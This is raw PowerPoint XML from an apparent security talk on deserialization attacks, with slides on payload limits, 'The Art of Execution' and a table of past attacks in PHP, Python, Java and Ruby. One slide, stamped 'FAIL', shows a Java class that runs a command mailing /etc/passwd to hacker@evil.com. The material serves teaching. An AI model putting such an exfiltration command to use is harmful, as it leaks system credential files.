          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665041" y="2145281"/>
            <a:ext cx="5659683" cy="2741043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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sz="1600" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PwnObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> implements Serializable {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PwnObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>java.lang.Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>().exec("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> hacker@evil.com &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	} catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>java.io.IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>("Something failed.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3085857" y="2262485"/>
            <a:ext cx="2972289" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="12800" b="1" cap="none" spc="0" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx2">
                      <a:tint val="1000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50000" dist="50800" dir="7500000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:shade val="5000"/>
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>FAIL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12800" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:tint val="1000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50000" dist="50800" dir="7500000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:shade val="5000"/>
                    <a:alpha val="35000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3231180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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limits of Serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1970088"/>
            <a:ext cx="7626350" cy="3630612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Serialization sends the member variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Serialization does not send functions. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="1343025" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IN GENERAL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="5408946"/>
            <a:ext cx="2381250" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXCEPT WHEN IT DOES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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81463" y="2689523"/>
            <a:ext cx="1501976" cy="1882477"/>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62426" y="2689522"/>
            <a:ext cx="1501976" cy="1882477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="2905125"/>
            <a:ext cx="1809750" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4810125" y="2809876"/>
            <a:ext cx="1809750" cy="1657349"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>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val="42342914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t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Art </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xecution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807424" y="1643765"/>
            <a:ext cx="7626350" cy="4095750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>o execute code we need to find:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>class that’s already defined on the system,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> whose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>constructor (or destructor) can be subverted to EXECUTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that we provide via parameters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40682835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Attacks Through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1134737371"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="719872" y="1789685"/>
          <a:ext cx="7626096" cy="3408680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1190625"/>
                <a:gridCol w="1238250"/>
                <a:gridCol w="5197221"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Language</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Year</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>PHP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2009</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Attacks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> via __wakeup or __destruct (Zend framework)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Python</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2011</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Easy execution via deserialization in</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Twisted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>AuthToken</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2011</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Spring </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>JdkDynamicAopProxy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>,  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>DefaultListableBean</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Factory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> allow execution on instantiation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2012</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Struts2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>CookieInterceptor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> (OGNL evaluation)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Ruby</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2013</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> via XML request with embedded YAML</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2015</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
